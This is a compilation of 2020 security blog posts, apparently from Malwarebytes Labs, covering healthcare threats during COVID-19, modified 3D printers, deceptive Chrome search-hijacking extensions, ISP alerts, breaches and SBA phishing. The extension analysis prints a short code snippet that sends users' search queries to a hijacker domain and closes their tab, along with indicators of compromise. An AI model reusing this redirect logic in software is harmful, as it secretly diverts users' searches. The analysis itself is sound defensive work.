IT NEWS

The impact of COVID-19 on healthcare cybersecurity

As if stress levels in the healthcare industry weren’t high enough due to the COVID-19 pandemic, risks to its already fragile cybersecurity infrastructure are at an all-time high. From increased cyberattacks to exacerbated vulnerabilities to costly human errors, if healthcare cybersecurity wasn’t circling the drain before, COVID-19 sent it into a tailspin.

No time to shop for a better solution

As a consequence of being too occupied with fighting off the virus, some healthcare organizations have found themselves unable to shop for different security solutions better suited for their current situation.

For example, the Public Health England (PHE) agency, which is responsible for managing the COVID-19 outbreak in England, decided to prolong their existing contract with their main IT provider without allowing competitors to put in an offer. They did this to ensure their main task, monitoring the widespread disease, could go forward without having to worry about service interruptions or other concerns.

Extending a contract without looking at competitors is not only a recipe for getting a bad deal, but it also means organizations are unable to improve on the flaws they may have found in existing systems and software.

Attacks targeting healthcare organizations

Even though there were some early promises of removing healthcare providers as targets after COVID-19 struck, cybercriminals just couldn’t be bothered to do the right thing for once. In fact, we have seen some malware attacks specifically target healthcare organizations since the start of the pandemic.

Hospitals and other healthcare organizations have shifted their focus and resources to their primary role. While this is completely understandable, it has placed them in a vulnerable situation. Throughout the COVID-19 pandemic, an increasing amount of health data is being controlled and stored by the government and healthcare organizations. Reportedly this has driven a rise in targeted, sophisticated cyberattacks designed to take advantage of an increasingly connected environment.

In healthcare, it’s also led to a rise in nation-state attacks, in an effort to steal valuable COVID-19 data and disrupt care operations. In fact, the sector has become both a target and a method of social engineering advanced attacks. Malicious actors taking advantage of the pandemic have already launched a series of phishing campaigns using COVID-19 as a lure to drop malware or ransomware.

COVID-19 has not only placed healthcare organizations in direct danger of cyberattacks, but some have become victims of collateral damage. There are, for example, COVID-19-themed business email compromise (BEC) attacks that might be aiming for exceptionally rich targets. However, some will settle for less if it is an easy target—like one that might be preoccupied with fighting a global pandemic.

Ransomware attacks

As mentioned before, hospitals and other healthcare organizations run the risk of falling victim to “spray and prey” attack methods used by some cybercriminals. Ransomware is only one of the possible consequences, but arguably the most disruptive when it comes to healthcare operations—especially those in charge of caring for seriously ill patients.

INTERPOL has issued a warning to organizations at the forefront of the global response to the COVID-19 outbreak about ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments. INTERPOL’s Cybercrime Threat Response team detected a significant increase in the number of attempted ransomware attacks against key organizations and infrastructure engaged in the virus response.

Special COVID-19 facilities

During the pandemic, many countries constructed or refurbished special buildings to house COVID-19 patients. These were created to quickly increase capacity while keeping the COVID patients separate from others. But these ad-hoc COVID-19 medical centers now have a unique set of vulnerabilities: They are remote, they sit outside of a defense-in-depth architecture, and the very nature of their existence means security will be a lower priority. Not only are these facilities prone to be understaffed in IT departments, but the biggest possible chunk of their budget is deployed to help the patients.

Another point of interest is the transfer of patient data from within the regular hospital setting to these temporary locations. It is clear that the staff working in COVID facilities will need the information about their patients, but how safely is that information being stored and transferred? Is it as protected in the new environment as the old one?

Data theft and protection

A few months ago, when the pandemic proved to be hard to beat, many agencies reported about targeted efforts by cybercriminals to lift coronavirus research, patient data, and more from the healthcare, pharmaceutical, and research industries. Among these agencies were the National Security Agency, the FBI, the Department of Homeland Security’s Cybersecurity and Infrastructure Agency, and the UK National Cyber Security.

In the spring, many countries started discussing the use of contact tracing and/or tracking apps in an effort to help keep the pandemic under control. Apps that would warn users if they had been in the proximity of an infected user. Understandably, many privacy concerns were raised by advocates and journalists.

There is so much data being gathered and shared with the intention of fighting COVID-19, but there’s also the need to protect individuals’ personal information. So, several US senators introduced the COVID-19 Consumer Data Protection Act. The legislation would provide all Americans with more transparency, choice, and control over the collection and use of their personal health, device, geolocation, and proximity data. The bill will also hold businesses accountable to consumers if they use personal data to fight the COVID-19 pandemic.

The impact

Even though such a protection act might be welcome and needed, the consequences for an already stressed healthcare cybersecurity industry might be too overwhelming. One could argue that data protection legislation should not be passed on a case by case basis, but should be in place to protect citizens at all times, not just when extra measures are needed to fight a pandemic.

In the meantime, we at Malwarebytes will do our part to support those in the healthcare industry by keeping malware off their machines—that’s one less virus to worry about.

Stay safe everyone!

The post The impact of COVID-19 on healthcare cybersecurity appeared first on Malwarebytes Labs.

Lock and Code S1Ep13: Monitoring the safety of parental monitoring apps with Emory Roane

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Emory Roane, policy counsel at Privacy Rights Clearinghouse, about parental monitoring apps.

These tools offer parents the capabilities to spot where their children go, read what their kids read, and prevent them from, for instance, visiting websites deemed inappropriate. And, for the likely majority of parents using these tools, their motives are sympathetic—being online can be a legitimately confusing and dangerous experience.

But where parental monitoring apps begin to cause concern is just how powerful they are.

Tune in to hear about the capabilities of parental monitoring apps, how parents can choose to safely use these with their children, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes storeGoogle Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news

  • Intel experienced a leak due to “intel123″—the weak password that secured its server. (Source: Computer Business Review)
  • Fresh Zoom vulnerabilities for its Linux client were demonstrated at DEFCON 2020. (Source: The Hacker News)
  • Researchers saw an increase in scam attacks against users of Netflix, YouTube, HBO, and Twitch. (Source: The Independent)
  • TikTok was found collecting MAC addresses from mobile devices, a tactic that may have violated Google’s policies. (Source: The Wall Street Journal)
  • Several ads of apps labelled “stalkerware” can still be found in Google Play’s search results after the search giant’s advertising ban already took effect (Source: TechCrunch)

Stay safe, everyone!

The post Lock and Code S1Ep13: Monitoring the safety of parental monitoring apps with Emory Roane appeared first on Malwarebytes Labs.

Explosive technology and 3D printers: a history of deadly devices

Hackers: They’ll turn your computer into a BOMB!

“Hackers turning computers into bombs” is a now legendary headline, taken from the Weekly World News. It has rather set the bar for “people will murder you with computers” anxiety. Even those familiar with the headline may not have dug into the story too much on account of how silly it sounds, but it’s absolutely well worth checking out if only for the bit about “assassins” and “dangerous sociopaths.”

Has blasting apart your computer “like a large hand grenade” ever been so much fun? Would it only be a little bit terrifying if the hand grenade was incredibly small? How many decently-sized grenades does it take to make your computer explode like a bomb, anyway? Is the bomb also incredibly large? What kind of power are we talking here, because it would frankly be anti-climatic if it turns out to be a hoax.

Maybe the real grenades were the bombs we made along the way

However you stack it up, the antics of highly combustible cyber assassins are often overplayed for dramatic effect. At this point I’d like to ask, “Who remembers the terrible Y2k trend of exploding computers?” but as you’re aware, that didn’t actually end up happening. Lots of hard-working people spent an incredible amount of time ensuring the Millennium bug didn’t cause Millennium-bug related problems, but I don’t think they were thinking of dramatic explosions when they were doing so.

Still, there’s always been a way to affect hardware in (significantly less spectacular) ways, though most of them seem to be a combination of user error or tinkering with hardware hacks. Even the article above mentions someone claiming to make one of these start smoking by writing programs which toggled the cassette relay switch rapidly. I, myself, once woke up to a PC on fire (and I do mean on fire) after something broke overnight and I was met with the smell of metal burning, plastic melting, and an immediate concern related to not having the house burn down around me.

Evil cyber assassins making you explode, though?

Not that common, sorry. However, there has been the occasional bad event down the years where hardware was specifically targeted in frankly terrifying ways. 

Breaking hardware for fun, profit, and confusion

Before we set down some of the most common techniques hardware can be impacted in ways they probably shouldn’t be, we’ll set the bar early and highlight what’s likely the biggest, baddest example of hardware tampering. Stuxnet, a worm targeting SCADA systems, caused large amounts of damage at a nuclear facility in Iran between 2009/10. It did this by speeding up, slowing down, and then speeding up centrifuges till they were unable to cope and broke. Up to 1,000 centrifuges were taken down as a result of the attack [PDF]. This is an assault which clearly took an incredible amount of planning and prep-work to pull off, and you’ll see the phrase “Nation state attack” an awful lot if you go digging into it.

This is, without a doubt, the benchmark for dragging digital attacks into real-world impact. A close runner-up would be 2017s Wannacry attack which impacted the NHS [PDF]. The key difference is that the plant in Natanz was deliberately targeted, and the infection had specific instructions for a specific task related to the centrifuges. The NHS was “simply” caught in the fallout, and not targeted specifically.

Attacks on people at home, or smaller organisations, tend to be on a much smaller scale. The idea isn’t really to break the hardware beyond repair to make some sort of statement; the device is useful because they can keep on using it. Even so, the impact can range from “mild inconvenience” to “potentially life threatening”. 

What’s mining is mine

You could end up with a higher electricity bill than normal should you find some Bitcoin miners hiding under the hood. This might keep you warm on a chilly winter evening, but it’s not particularly advisable for financial outlay or individual PC parts. The problem with your standard Bitcoin miner placed on a system without permission is the resources they gobble up for computations. They love those big, juicy graphics cards for maximum money-making.

Having said that, your child’s middle-range gaming laptop is also a perfectly acceptable target for them. If the cooling fans are going haywire even when no game is running, it might be time to start running some scans. Overheating can be mitigated on desktops unless they’re clogged up with a lot of dust or faulty parts, but the margin for error is a lot smaller with a laptop. All that heat built up in one siginificantly smaller space over time isn’t great, and while toasting the machine wouldn’t be part of the Bitcoin miner’s gameplan, it’s one side-effect to be wary of.

On the flipside, modern systems are actually pretty good at combating heat…especially if you’re even a little bit into gaming. The reason you don’t see stories in the news about evil hackers melting computers is that a) it is, again, ultimately pointless b) it would be pretty difficult to pull off. Hardware comes with all sorts of failsafes, temperature sensors, shutdown routines, power spike protection, and much more. It would mean significant amounts of time and effort, in the vague hope you end up with something a little more impressive than “The PC shut down to prevent damage and it’s fine”.

BIOs / firmware hacks

Could you bludgeon your way into the very innards of the PC, and force it to do all sorts of terrible things? Perhaps. As with a lot of these scenarios, it typically relies on multiple steps and one specific target in mind. Malicious firmware is a possibility, but you’ll need to set the risk besides the likelihood of this happening. Once more, we see the inherent drawback in “make thing go boom”, or even just bricking the machine forever so it’s unusable. Having someone go to these lengths to attack your PC in this way is probably outside your threat model.

Not impossible, but unlikely. Somebody doing the above wants your data, not your laptop on fire. As a result, you absolutely should be cautious when in a place that isn’t your home.

IoT compromise

The world is filled with cheap, poorly secured bits of technology filling up our homes. Security is an afterthought, and even where it isn’t, bad things can still happen. At the absolute opposite end of pretend hackers turning your computer into a bomb, are the people whose sole intention is to compromise devices and live on them for as long as possible. Information, and control, are the two key currencies for domestic abusers implanting hacks into hardware.

Awfully bad, but awfully rare

These are all awful things, in various steep degrees of severity. They tamper with systems and processes in ways which can directly impact the physical operation of a device, or do it in a manner which leaves the object intact but causes trouble in the real world in other, less incendiary ways.

In terms of making things blow up, bomb style, we’re still at a bit of a loss.

All the same: there is a genuine threat aspect to all this, as we’re about to find out.

Strap yourself in and command the DeLorean as we jump from a Register article back in July 2000, to another one along similar lines at the tail end of July, 2020. Despite the warnings, it’s now 20 years on where we’re finally at the point where something a bit like your PC could go kaboom.

The entity known as time comes crashing through the window, reminding me of my melted and very much ablaze PC from about fourteen years ago. Your devices can and do catch fire for a variety of reasons, and they don’t have to be related to hacking.

In the case of a 3D printer enthusiast who found their device bellowing smoke, the likely culprit was a loose heating element and a bit of bad luck to set everything ablaze. Note that the post-incident assessment includes a rework of the physical space around the device. Everything from storage to safety equipment is now considered, to combat (as they put it), the placement of a heavy-duty bit of kit inside a “burn-my-house-down box”.

This is similar to ensuring the space around a VR gaming setup is also secured, in terms of mats on the floor so you know when you’ve wandered out of the safety zone, wires suspended by the ceiling, no sharp / dangerous items nearby and so on. Sadly, people don’t consider the ways in which physical danger presents itself via digital devices.

Keep all of this in mind, when checking out what comes next.

What comes next, is a 3D printer modified with the intention of seeing if it’s possible to “weaponize this 3D printer into a firebomb”.

Weaponizing a 3D printer into a firebomb?

Researchers at Coalfire toiled hard at creating a hand-crafted method to alter the way a specific 3D printer operates and have it hit increasingly dangerous temperatures. In their final bout of testing, the smoke and fumes were so bad in an outdoor location that they couldn’t be closer than 6ft from the smouldering device.

This is, of course, an incredibly bad situation to be in. However, there are some big caveats attached to this one in terms of threat. All 3D printers are a potential fire risk, because they naturally enough involve activities requiring high temperatures. If you leave them alone…and you really shouldn’t…you could end up with the aforementioned burn-my-house-down box. There are also emissions to consider.

In my former life as an artist, I did a lot of work around the old-style MDF which contained all manner of bad things if you cut into it and precautions had to be taken. Similarly, you have to pay attention to what may be wafting out of your printer.

I’ve dabbled in 3D printing a little bit, and the technology encourages me to treat it with a healthy bit of respect on account of how deadly it could be by default, with no tampering required, simply via me getting something wrong.

A good approach generally, I find.

Of worst case scenarios

We don’t know for sure how bad the smoking printer would’ve ended up, given the switch-off when the fumes became too much. A total meltdown seems likely, but a “bomb” as such probably won’t be the case.

This also isn’t something you can casually throw together at the drop of a hat. It’s not one short blog post showing how easy it is; it’s 3 posts of trying an awful lot of things out. Rooting the printer and cracking passwords, digging into board architecture, installing NSA tools to explore functions. Much more.

Creating extra space to house the new code, adjusting the max temperature variable then having to figure out how to bypass the error protection closing down any overenthusiastic temperature increases.

Much, much more.

Note also that to force the device to overheat beyond the safe “cut out” point, they had to replace the power supply with something bigger to achieve the required cookout levels.

It’s an awful lot of work to set your printer on fire. Of course, one worry might be a situation where the modified code is somehow pushed to device owners after some sort of compromise. You could also perhaps send people the rogue code directly as a supposed “update” and let them do the hard work.

One way around this is signed code from the vendor, though there’s usually resistance to that from some folks in maker circles because of issues related to planned obsolescence. Additionally, some prefer to download updates directly from the manufacturer’s website and aren’t keen on auto-updates for their printing tools.

Even so: regardless of the issues surrounding who wants which type of update, or if signed code would fix things or bring unforeseen hassles for the end-user, somebody compromising you remotely with this in some way would still need you to have switched out for a bigger power supply for the big boom.

That’s not very likely.

Hackers: they’ll turn your printer into a BOMB!

For the time being, your printer is (probably) not going to fulfil the prophesied digital cyber-grenade of lore. You’ve got more than enough to be getting on with where basic precautions are concerned, never mind worrying about someone blowing up your house with a toaster or USB headphones.

Treat your 3D printer with respect, follow the safety guidelines for your device, and never, ever leave it running and unattended. You don’t want to end up on the front page of the Weekly World News in 2040.

The post Explosive technology and 3D printers: a history of deadly devices appeared first on Malwarebytes Labs.

Chrome extensions that lie about their permissions

“But I checked the permissions before I installed this pop-up-blocker—it said nothing about changing my searches,” my dad retorts after I scold him for installing yet another search-hijacking Chrome extension. Granted, they are not hard to remove, but having to do it over and over is a nuisance. This is especially true because it can be hard to find out which of the Chrome extensions is the culprit if the browser starts acting up.

What happened?

Recently, we came across a family of search hijackers that are deceptive about the permissions they are going to use in their install prompt. This extension, called PopStop, claims it can only read your browsing history. Seems harmless enough, right?

PopStop install message

The install prompt in the webstore is supposed to give you accurate information about the permissions the extension you are about to install requires. It already is habit for browser extensions to only ask for permissions needed to function properly up front—then ask for additional permissions later on after installing. Why? Users are more likely to trust an extension with limited warnings or when permissions are explained to them.

But what is the use of these informative prompts if they only give you half the story? In this case, the PopStop extension doesn’t just read your browsing history, as the pop-up explains, but it also hijacks your search results.

Some of these extensions are more straightforward once the user installs them and they are listed under the installed extensions.

Niux APP extension

But others are consistent in their lies even after they have been installed, which makes it even harder to find out which one is responsible for the search hijack.

PopStop extension

How is this possible?

Google had at some point decided to bar extensions that obfuscate their code. By doing so, it’s easier for them to read the plug-in’s programming and conduct appropriate analysis.

The first step in determining what an extension is up to is in looking at the manifest.json file.

manifest.json

Registering a script in the manifest tells the extension which file to reference, and, optionally, how that file should behave.

What this manifest tells us is that the only active script is “background.js” and the declared permissions are “tabs” and “storage”. More about those permissions later on.

The relevant parts in background.js are these pieces, because they show us where our searches are going:

const BASE_DOMAIN = 's3redirect.com', pid = 9126, ver = 401;
chrome.tabs.create({url: `https://${BASE_DOMAIN}/chrome3.php?q=${searchQuery}`});
        setTimeout(() => {
          chrome.tabs.remove(currentTabId);
        }, 10);

This script uses two chrome.tabs methods: One to create a new tab based on your search query, and the other to close the current tab. The closed tab would have displayed the search results from your default search provider.

Looking at the chrome.tabs API, we read:

“You can use most chrome.tabs methods and events without declaring any permissions in the extension’s manifest file. However, if you require access to the url, pendingUrl, title, or favIconUrl properties of tabs.Tab, you must declare the “tabs” permission in the manifest.”

And indeed, in the manifest of this extension we found:

"permissions": [ "tabs", "storage" ],

The “storage” permission does not invoke a message in the warning screen users see when they install an extension. The “tabs” permission is the reason for the “Read your browsing history” message. Although the chrome.tabs API might be used for different reasons, it can also be used to see the URL that is associated with every newly-opened tab.

The extensions we found managed to avoid having to display the message, “Read and change all your data on the websites you visit” that would be associated with the “tabCapture” method. They did this by closing the current tab after capturing your search term and opening a new tab to perform the search for that term on their own site.

The “normal” permission warnings for a search hijacker would look more similar to this:

warning1 ConvertrSearch

The end effect is the same, but an experienced user would be less likely to install this last extension, as they would either balk at the permission request or recognize the plug-in as a search hijacker by looking at these messages.

Are these extensions really lying?

Some might call it a lie. Some may say no, they simply didn’t offer the whole truth. However, the point of those permissions pop-ups is to give users the choice on whether to download a program by being upfront about what that program asks of its users.

In the case of these Chrome extensions, then, let’s just say that they’re not disclosing the full extent of the consequences of installing their extensions.

It might be desirable if Google were to add a possible message for extensions that use the chrome.tabs.create method. This would inform the user that his extension will be able to open new tabs, which is one way of showing advertisements so users would be made aware of this possibility. And chrome.tabs.create also happens to be the method that this extension uses to replace the search results we were after with their own.

An additional advantage for these extensions is the fact that they don’t get mentioned in the settings menu as a “regular” search hijacker would.

searchsettings
A search hijacker that replaces your default search engine would be listed under Settings > Search engine

Not being listed as the search engine replacement, again, makes it harder for a user to figure out which extension might be responsible for the unexpected search results.

For the moment, these hijackers can be recognized by the new header they add to their search results, which looks like this:

search header

This will probably change once their current domains are flagged as landing pages for hijackers, and new extensions will be created using other landing pages.

Further details

These extensions intercept search results from these domains:

  • aliexpress.com
  • booking.com
  • all google domains
  • ask.com
  • ecosia.org
  • bing.com
  • yahoo.com
  • mysearch.com
  • duckduckgo.com

It also intercepts all queries that contain the string “spalp2020”. This is probably because that string is a common factor in the installer url’s that belong to the powerapp.download family of hijackers.

spapl2020

Search hijackers

We have written before about the interests of shady developers in the billion-dollar search industry and reported on the different tactics these developers resort to in order to get users to install their extensions or use their search sites[1],[2],[3].

While this family doesn’t use the most deceptive marketing practices out there, it still hides its bad behavior in plain sight. Many users have learned to read the install prompt messages carefully to determine whether an extension is safe. It’s disappointing that developers can evade giving honest information and that these extensions make their way into the webstore over and again.

IOC’s

extension identifiers:

pcocncapgaibfcjmkkalopefmmceflnh

dpnebmclcgcbggnhicpocghdhjmdgklf

search domains:

s3redirect.com

s3arch.page

gooogle.page <= note the extra “o”

Malwarebytes detects these extension under the detection name PUP.Optional.SearchEngineHijack.Generic.

Stay safe, everyone!

The post Chrome extensions that lie about their permissions appeared first on Malwarebytes Labs.

Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw

“Can you have a look at this email I got, please?” my brother asked. “It looks convincing enough, but I don’t trust it,” he added and forwarded me the email he received from Ziggo, his Internet Service Provider (ISP). Shortly after, he informed me that despite its suspicious aura, he found confirmation that the email was, in fact, legitimate.

In the suspect email, the Dutch ISP informed customers that an expert had found a weakness in the “Wifibooster Ziggo C7,” a device they sell to strengthen WiFi signals. Ziggo told users how to recognize this equipment, and urged them to change the default password and settings.

So what’s the problem? Alerting customers about a security flaw is best practice, is it not? Absolutely. But when your email alert about a security vulnerability looks like a phish itself, it’s time to reevaluate your email marketing strategy.

In this blog, I’ll break down what exactly happened with Ziggo, the flaws in their email communication, and how organizations should approach informing their employees and customers about potential security issues—without looking like a phishing scam.

What exactly happened?

Dutch ISP Ziggo sent out an email to their customers warning about a security weakness in a specific device that they sell to their customers. I translated the relevant parts of the mail from Dutch below:

“Dear Mister Arntz,

To keep our network safe, experts are looking for weak spots. Unfortunately, such a weakness was found in the Wifibooster Ziggo C7. You can recognize the device by the ‘C7’ mark at the bottom. This email is about this device and this type only.

Do you indeed use the Wifibooster Ziggo C7? In that case change the default settings in your personal settings to keep your device safe. Below we will explain how.

How to change your password

To make the chance of abuse as small as possible, it’s necessary to change your password. Go to link to Ziggo site, follow the instructions there and use a strong password.

Want to know more or need help?

Follow the link to the Ziggo forum where you can find more information about this subject and ask for help from the community members.”

This vague, unhelpful, and frankly dangerous advice was followed by a footer that contained nine more links, including (ironically enough) an anti-phishing warning.

What made the email look spammy?

We have spent years training people to recognize spam emails, and it is gratifying when our efforts pay off on occasion. The things my brother mentioned he found to be spammy were all the weird looking links in the email and the fact that he did not own the device that was the subject of the email.

I would like to add that the email mentioned a security weakness but did not specify which one. Also, the urge to change your password to avoid danger would be a dead give-away in a phishing mail.

So, we’ve got:

  • Subject does not apply directly to all receivers. Not every addressee had said device. When asked Ziggo stated they wanted to make sure that users that bought the device second-hand would be aware of the issue too.
  • A multitude of links that looked phishy probably because they were personalized.
phishy looking link
  • Urging receivers to go to a site and take precautions against an unclear threat.

The device

The Wifibooster Ziggo C7 is in fact a TP-Link Archer C7 that Ziggo sells to their customers with their own firmware installed. Therefore, it is hard to find any information about what the vulnerability might be. The Archer C7 is listed as affected by the WPA2 Security (KRACKs) vulnerability for certain firmware versions. But given the Ziggo device comes with custom firmware, it is hard to determine whether the Wifibooster Ziggo C7 is vulnerable as well.

Based on the fact that users are urged to change their wifi-passwords and the name of the network (SSID) and looking at the instructions we found on the site we are inclined to conclude that the device was shipped with default credentials, which might help attackers to exploit a remote acces vulnerability.

The possible danger

Ziggo warned the users that not following their instructions could lead to unauthorized access to their network.

We asked our resident hardware guru JP Taggart about this scenario and he was very weary about ISPs that put more than some branding deviations of the manufacturer’s firmware on the device. Once you start to drift away from the standard firmware you are responsible for maintaining and patching that firmware, because the manufacturer will no longer be able to or even want to. We have looked at some existing vulnerabilities for the Archer C7 but they are old and if they would apply it couldn’t be cured by changing the password and SSID.

ISPs make a habit of branding the firmware for the equipment they sell to their customers. Logic dictates that the security flaw must have been in this branded firmware, since we could not find any other recent warning about this particular type of device. Which would demonstrate JP Taggarts’ comment about the dangers of branded firmware.

What Ziggo could have done better

The most objectional part of the method Ziggo chose to inform is the phishy looking format they constructed their email in. The more companies do this, the harder it is for us to tell the real phishes apart from the legitimate emails. To be honest, some of the more sophisticated phishers have produced emails that looked less phishy than this one.

They also could have been a lot more open about the security flaw that was found. Of course we don’t expect them to post a full hackers guide on how to use an exploit and spy on your neighbor, but a little bit of concrete information on what was found and how that could be exploited would have made sense.

For the instructions of how to change the settings I would have found it preferable to list the basic steps in the email and include a link for those that need further or more detailed instructions. All the relevant and necessary information should have been in the mail and not been linked to. Links are fine, but not for crucial information.

During the installation of such a device the ISP should force the user to change the default password at least, and probably advise them to change the SSID as well. A default SSID tells an aspiring hacker which ISP you are using and they can make some informed guesses at which equipment you are using etc.

The danger of sending out phishy emails

Invested parties may have deleted the mail at first sight and never changed their password, making them vulnerable to the ‘flaw”.

Or, as our own William Tsing wrote in an older post called When corporate communications look like a phish:

“Essentially, well-meaning communications with these design flaws train an overloaded employee to exhibit bad behaviors—despite anti-phishing training—and discourage seeking help.”

This is also true for the home user that may not receive as many emails at home as an office employee does (120), but the ones that do receive a lot of mail, have trained themselves to recognize the emails that are important and ignore the rest. Which would be a shame if the included information is as important as the ISP wants us to believe.

Stay safe, everyone!

The post Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw appeared first on Malwarebytes Labs.

The skinny on the Instacart breach

The COVID-19 outbreak has affected many facets of our lives—from how we visit our families, socialize with friends, meet with colleagues, to how we should be conducting ourselves outside of our homes. Ideally, a few meters apart from everyone else and with a mask on.

These—on top of imposed lockdowns—have pushed most people to stay indoors, pushing them to do almost everything they want to do in real life online. This includes grocery shopping.

It is no wonder, then, to see a sudden spike in app downloads of food and grocery delivery apps. Similarly, it is also not a wonder to see that it didn’t take long for those with ill intent to find a way to score big from brands behind these apps. Or have they really?

Instacart, one of the top three brands in the grocery and pick-up services in the world, was recently believed to be hacked, after more than 270,000 accounts of its clients were seen being peddled in the Dark Web. It was reported that these accounts contained information, such as names, addresses, credit card data, and transaction history.

BuzzFeed News, who initially reported the incident, have indicated that some affected parties were interviewed and confirmed that, upon being shown data taken from breach, confirmed it was indeed their data being sold. A cybersecurity expert who also looked at some of the data put more weight into its the breach’s validity.

Days after the report, however, Instacart denied that a security breach happened. “Our teams have been working around the clock to quickly determine the validity of reports related to site security and so far our investigation had shown that the Instacart platform was not compromised or breached,” the company wrote in a Medium post.

Instead, the company asserted the belief that the reason client accounts may have been broken into was because their clients had been reusing login credentials.

As you may already know, password reuse is a huge cybersecurity problem, where the onus rests on users who continue to use the same username-password combinations on a lot or all their online accounts. This results in a chain of compromises for one individual. If an Instacart customer uses the same credentials to access their Twitter feed, Facebook page, favorite online magazine or news sites, online banking, or cloud storage accounts, for example, a compromise on any one of those sites would result in compromise for all the others.

While the reuse of credentials is indeed a known cybersecurity problem, solving it should not be up to users alone. One cannot help but wonder if all 278,531 accounts affected by the breach were because people had been reusing username-password combinations.

Whether you’re on the side of “Yes, they’ve been breached!” or “No, they’re securing my data well,” one thing is certain: Instacart shoppers and Internet users should play our part in keeping our online accounts as impenetrable as possible. While making sure you don’t reuse username and password combinations between accounts is one way to secure against multiple breaches, it’s certainly not full-proof protection.

If remembering passwords is challenging, you can always enlist the help of a trusty password manager that will serve as your memory and keep your credentials (and other important bite-size information) encrypted and away from prying eyes. For added security, use two-factor/multi-factor authentication.

On the one hand, security is not just the customers’ problem. Companies like Instacart should play their part, too, and own their piece of the pie. They can start doing this by securing their websites against hacks with credential stuffing, credit card skimmers, and other threats that target customer accounts. Multi-factor authenticate new clients to the platform and inform or push old ones to enable this feature for their existing accounts.

Of course, this should not be the end of securing user data for companies. Privacy compliance, PCI compliance, and encrypting data at rest and in transit are key to keeping customer credentials secure. Otherwise, organizations may find themselves skewered on Reddit.

Stay safe, shopper!

The post The skinny on the Instacart breach appeared first on Malwarebytes Labs.

A week in security (August 3 – 9)

Last week on Malwarebytes Labs, on our Lock and Code podcast, we talked about identity and access management technology. We also wrote about business email compromises to score big, discussed how the Data Accountability and Transparency Act of 2020 looks beyond consent, and we analyzed how the Inter skimming kit is used in homoglyph attacks.

Other cybersecurity news

  • A new and unpatchable exploit was allegedly found on Apple’s Secure Enclave chip. (Source: 9to5Mac)
  • The Australian government will include the capability for the Australian Signals Directorate to help law enforcement agencies identify and disrupt serious criminal activity—including in Australia. (Source: The Guardian)
  • The US Department of State is offering a $10 million reward for any information leading to the identification of any person who meddles in US elections. (Source: ZDNet)
  • Facebook Inc.’s Instagram photo-sharing app is launching its clone of TikTok in more than 50 countries. (Source: Bloomberg)
  • Intelligence agencies in the US have released information about a new variant the Taidoor virus used by China’s state-sponsored hackers targeting governments, corporations, and think tanks. (Source: The Hacker News)
  • A Zoombombing attack disrupted the bail hearing of one of the alleged Twitter hackers. (Source: Naked Security)
  • American small- and medium-sized companies (SMBs) were actively targeted by LockBit ransomware operators according to an Interpol report. (Source: Bleeping Computer)
  • The Clean Network program is a comprehensive approach to guarding US citizens’ privacy and US companies’ most sensitive information from aggressive intrusions by malign actors. (Source: US Department of State)
  • A researcher found a way to deliver malware to macOS systems using a Microsoft Office document containing macro code. (Source: SecurityWeek)
  • The Chrome Web Store was slammed again for allowing 295 ad-injecting, spammy extensions that were downloaded 80 million times. (Source: TheRegister)

Stay safe!

The post A week in security (August 3 – 9) appeared first on Malwarebytes Labs.

SBA phishing scams: from malware to advanced social engineering

A number of threat actors continue to take advantage of the ongoing coronavirus pandemic through phishing scams and other campaigns distributing malware.

In this blog, we look at 3 different phishing waves targeting applicants for Covid-19 relief loans. The phishing emails impersonate the US Small Business Administration (SBA), and are aimed at delivering malware, stealing user credentials or committing financial fraud.

In each of these campaigns, criminals are spoofing the sender’s email so that it looks like the official SBA’s. This technique is very common and unfortunately often misunderstood, resulting in many successful scams.

GuLoader malware

In April, we saw the first wave of SBA attacks using COVID-19 as a lure to distribute malware. The emails contained attachments with names such as ‘SBA_Disaster_Application_Confirmation_Documents_COVID_Relief.img’.

US SBA phishing scam
Figure 1: Spam email containing malicious attachment

The malware was the popular GuLoader, a stealthy downloader used by criminals to load the payload of their choice and bypass antivirus detection.

Traditional phishing attempt

The second wave we saw involved a more traditional phishing approach where the goal was to collect credentials from victims in order to scam them later on.

traditional US SBA scam
Figure 2: Phishing email luring users to a site to enter their credentials

A URL, especially if it has nothing to do with the sender, is a big giveaway that the email may be fraudulent. But things get a little more complicated when attackers are using attachments that look seemingly legitimate.

Advanced phishing attempt

This is what we saw in a pretty clever and daring scheme that tricks people into completing a full form containing highly personal information, including bank account details. These could be used to directly drain accounts or in an additional layer of social engineering, which tricks users into paying in advanced fees that don’t exist as part of the real SBA program.

advanced US SBA phishing attempt
Figure 3: Phishing email containing a loan application form

This latest campaign started in early August and is convincing enough to fool even seasoned security experts. Here’s a closer look at some red flags we encountered as we analyzed it.

Most people aren’t aware of email spoofing and believe that if the sender’s email matches that of a legitimate organization, it must be real. Unfortunately, that is not the case, and there are additional checks that need to be performed to confirm the authenticity of a sender.

There are various technologies for confirming the true sender email address, but we will instead focus on the emails headers, a sort of blue print that is available to anyone. Depending on the email client, there are different ways to view such headers. In Outlook, you can click File and then Properties to display them:

outlook email headers to avoid scams
Figure 4: Email headers showing suspicious sender

One of the items to look at is the “Received” field. In this case, it shows a hostname (park-mx.above[.]com) that looks suspicious. In fact, we can see it has already been mentioned in another scam campaign.

If we go back to this email, we see that it contains an attachment, a loan application with the 3245-0406 reference number. A look at the PDF metadata can sometimes reveal interesting information.

SBA scam pdf metadata
Figure 5: Suspicious load application form and its metadata

Here we note the file was created on July 31 with Skia, a graphics library for Chrome. This tells us that the fraudsters created that form shortly before sending the spam emails.

For comparison, if we look at the application downloaded from the official SBA website, we see some different metadata:

official SBA pdf metadata
Figure 6: Official loan application form and its metadata

This legitimate application form was created used Acrobat PDFMaker for Word on March 27 which coincides with the pandemic timeline.

The loan application would typically be printed out and then mailed to a physical address at one of the government offices. If we go back to the original email, it asks to send the completed form as a reply via email instead:

malwarebytes fake sba scam email
Figure 7: Reply email would send loan application form to criminals

This is where things get interesting. Even though the sender’s email is disastercustomerservice@sba.gov, when you hit the reply button, it shows a different email address at: disastercustomerservice@gov-sba[.]us. While sba.gov is the official and legitimate government website, gov-sba[.]us is not.

spoofed email from sba phishing email
Figure 8: Domain registered by scammers shortly before the attack

That domain name (gov-sba[.]us) was registered just days before the email campaign began and clearly does not belong to the US government.

